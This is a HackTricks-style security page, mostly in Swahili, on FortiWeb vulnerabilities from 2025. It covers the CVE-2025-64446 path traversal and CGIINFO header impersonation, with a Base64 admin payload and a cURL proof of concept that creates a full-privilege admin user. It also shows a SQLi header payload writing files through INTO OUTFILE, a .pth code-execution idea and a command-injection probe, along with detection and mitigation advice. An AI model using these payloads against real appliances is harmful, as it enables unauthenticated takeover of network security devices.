Fortinet FortiWeb β€” Auth bypass via API-prefix traversal and CGIINFO impersonation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Muhtasari

Fortinet FortiWeb inaonyesha dispatcher kuu wa CGI katika /cgi-bin/fwbcgi. Mnyororo wa dosari mbili unaruhusu mshambuliaji wa mbali asiyethibitishwa kufanya:

  • Kufikia fwbcgi kwa kuanza URL na API prefix halali na traversing directories.
  • Kuiga mtumiaji yeyote (ikiwa ni pamoja na admin iliyojengwa) kwa kutoa HTTP header maalum ambayo CGI inaamini kama utambulisho.

Ushauri wa muuzaji: FG‑IR‑25‑910 (CVE‑2025‑64446). Uvitumaji umeonekana katika mazingira ya kweli kuunda watumiaji wa admin wa kudumu.

Matoleo yaliyoathiriwa (kama ilivyoonyeshwa hadharani):

  • 8.0 < 8.0.2
  • 7.6 < 7.6.5
  • 7.4 < 7.4.10
  • 7.2 < 7.2.12
  • 7.0 < 7.0.12
  • 6.4 ≀ 6.4.3
  • 6.3 ≀ 6.3.23

FortiWeb 8.0.2 inarudisha HTTP 403 kwa traversal probe hapa chini.

Jaribio la haraka la udhaifu

  • Path traversal from API prefix to fwbcgi:
GET /api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: <target>
  • Tafsiri: HTTP 200 β†’ ina uwezekano wa kuwa dhaifu; HTTP 403 β†’ imerekebishwa.

Mnyororo wa chanzo msingi

  1. API-prefix path traversal hadi CGI ya ndani
  • Njia yoyote ya ombi inayotanguliwa na API-prefix halali ya FortiWeb (mfano, /api/v2.0/cmdb/ au /api/v2.0/cmd/) inaweza kutumia ../ kwa path traversal hadi /cgi-bin/fwbcgi.
  1. Minimal-body validation bypass
  • Mara fwbcgi inapoafikiwa, lango la kwanza hufanya ukaguzi wa JSON unaoruhusu (permissive) unaoendeshwa na faili maalum kwa kila path chini ya /var/log/inputcheck/. Ikiwa faili haipo, ukaguzi hupitishwa mara moja. Ikiwa ipo, body inahitaji tu kuwa JSON halali. Tumia {} kama body ndogo inayokubalika.
  1. Kuiga mtumiaji kuendeshwa na header
  • Programu husoma environment variable ya CGI HTTP_CGIINFO (iliyotokana na HTTP header CGIINFO), hufanya Base64-decode yake, inachanganua JSON, na kunakili sifa moja kwa moja ndani ya login context, ikiwasha domain/VDOM. Vifunguo vinavyovutia:
  • username, loginname, vdom, profname
  • Mfano wa JSON kuiga admin aliyepo built-in:
{
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}

Base64 ya hapo juu (kama inavyotumika katika mazingira halisi):

eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==

Mfano wa matumizi mabaya kutoka mwanzo hadi mwisho (bila uthibitisho β†’ admin)

  1. Fikia /cgi-bin/fwbcgi kupitia API-prefix traversal.
  2. Toa body yoyote ya JSON halali (kwa mfano, {}) ili kukidhi ukaguzi wa ingizo.
  3. Tuma header CGIINFO: <base64(json)> ambapo JSON inaelezea utambulisho wa lengo.
  4. POST JSON ya backend inayotarajiwa na fwbcgi ili kutekeleza vitendo vyenye ruhusa za juu (kwa mfano, kuunda mtumiaji admin kwa ajili ya kudumu).

PoC ndogo ya cURL

  • Kagua kama kuna exposure ya traversal:
curl -ik 'https://<host>/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi'
  • Jifanya admin na unda local admin user mpya:
# Base64(JSON) for admin impersonation
B64='eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ=='

curl -ik \
-H "CGIINFO: $B64" \
-H 'Content-Type: application/json' \
-X POST \
--data '{"data":{"name":"watchTowr","access-profile":"prof_admin","access-profile_val":"0","trusthostv4":"0.0.0.0/0","trusthostv6":"::/0","type":"local-user","type_val":"0","password":"P@ssw0rd!"}}' \
'https://<host>/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi'

Notes:

  • Mwili wowote wa JSON halali unatosha (mfano, {}) ikiwa /var/log/inputcheck/<path>.json haipo.
  • Action schema ni ya ndani ya FortiWeb; mfano hapo juu unaongeza admin wa ndani mwenye ruhusa kamili.

Udhaifu mwingine wa FortiWeb 2025 unaostahili kukaguliwa kwa haraka

Pre-auth Fabric Connector SQLi β†’ RCE (CVE-2025-25257)

  • Inaathiri 7.6.0–7.6.3, 7.4.0–7.4.7, 7.2.0–7.2.10, 7.0.0–7.0.10. Imewekwa suluhisho katika 7.6.4 / 7.4.8 / 7.2.11 / 7.0.11.
  • Hitilafu: get_fabric_user_by_token() inatumia thamani ya Authorization: Bearer <token> moja kwa moja katika query ya SQL. Mshambuliaji huingiza SQL inayotekelezwa kama mtumiaji wa MySQL na inaweza kuandika faili kwa kutumia SELECT ... INTO OUTFILE, ikitoa code exec (webshell/.pth loader).
  • Uso wa shambulio wa kawaida: /api/fabric/device/status (na endpoints nyingine za Fabric Connector) over HTTP/HTTPS kwenye management plane.
  • Mtihani wa haraka kwa SQLi:
curl -sk -X POST \
-H "Authorization: Bearer ' UNION SELECT NULL,NULL,NULL,NULL INTO OUTFILE '/data/var/tmp/pwn.txt' -- -" \
https://<host>/api/fabric/device/status
  • Weaponization: andika .pth ndani ya FortiWeb’s Python site-packages inayofanya import os;os.system(...) wakati interpreter inapoanza, au weka CGI chini ya webroot. Kureload huduma kutatekeleza payload.
  • Hunting clues: Authorization headers containing quotes/UNION/SELECT; faili zisizotarajiwa chini ya /data/lib/python*/site-packages/ au /data/var/waf/html/ROOT/cgi-bin/.

FortiCloud SSO signature bypass (CVE-2025-59719)

  • Improper SAML signature verification inaruhusu mshambuliaji kutengeneza majibu ya FortiCloud SSO na kuingia kama admin bila credentials.
  • Inaweza kutumika tu wakati FortiCloud SSO login imewezeshwa (inawezeshwa kiotomatiki ikiwa appliance ilirajistiwa kupitia GUI isipokuwa checkbox iliondolewa).
  • Yaliyoathirika (kulingana na PSIRT): 8.0.0, 7.6.0–7.6.4, 7.4.0–7.4.9. Imerekebishwa katika 8.0.1 / 7.6.5 / 7.4.10.

OS command injection in management plane (CVE-2025-58034)

  • Affected: 7.0.0–7.0.11, 7.2.0–7.2.11, 7.4.0–7.4.10, 7.6.0–7.6.5, 8.0.0–8.0.1. Fixed in 7.0.12 / 7.2.12 / 7.4.11 / 7.6.6 / 8.0.2.
  • Practical probe (non-destructive): tuma parameter yenye ;id; kwa management HTTP endpoints na angalia majibu ya 500 yenye output ya command; zuia au patch mara moja ikiwa kuna echo yoyote.

Utambuzi

  • Requests zinazofikia /cgi-bin/fwbcgi kupitia API-prefix paths zenye ../ (mfano, /api/v2.0/cmdb/.../../../../../../cgi-bin/fwbcgi).
  • Uwepo wa header CGIINFO yenye Base64 JSON iliyo na keys username/loginname/vdom/profname.
  • Fabric Connector SQLi: Authorization headers containing SQL metacharacters, faili za ghafla katika Python site-packages/CGI dirs, hits kwa /api/fabric/device/status kutoka IP za internet.
  • FortiCloud SSO: SAML issuers au audience values zisizotarajiwa katika /var/log/ssod.
  • Backend artifacts:
  • Faili kwa njia (per-path) chini ya /var/log/inputcheck/ (gate configuration).
  • Utengenezaji usiotarajiwa wa admin na mabadiliko ya configuration.
  • Uthibitisho wa haraka: traversal probe kurudisha 200 (imetoa) vs 403 (imetengwa katika builds zilizorekebishwa).

Uzuiaji

  • Sasisha hadi releases zilizosuluhishwa (mifano: 8.0.2, 7.6.5, 7.4.10, 7.2.12, 7.0.12) kulingana na vendor advisory.
  • Patch mangine mawili ya 2025: SQLi (7.6.4/7.4.8/7.2.11/7.0.11), SSO bypass (8.0.1/7.6.5/7.4.10), command injection (7.6.6/7.4.11/7.2.12/7.0.12/8.0.2).
  • Mpaka patch iwepo:
  • Usifunike management plane ya FortiWeb kwa mitandao isiyotumika/kutokuwa ya kuaminika.
  • Ongeza reverse-proxy/WAF rules kuzuia:
  • Paths zinazotangulia na /api/ na zenye ../cgi-bin/fwbcgi.
  • Requests zenye header CGIINFO.
  • Fabric Connector calls zenye SQL metacharacters katika Authorization.
  • SAML endpoints kutoka internet ikiwa FortiCloud SSO haitumiki.
  • Fuatilia na toa alarms kwa vidokezo vya utambuzi vilivyotajwa hapo juu.

References

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks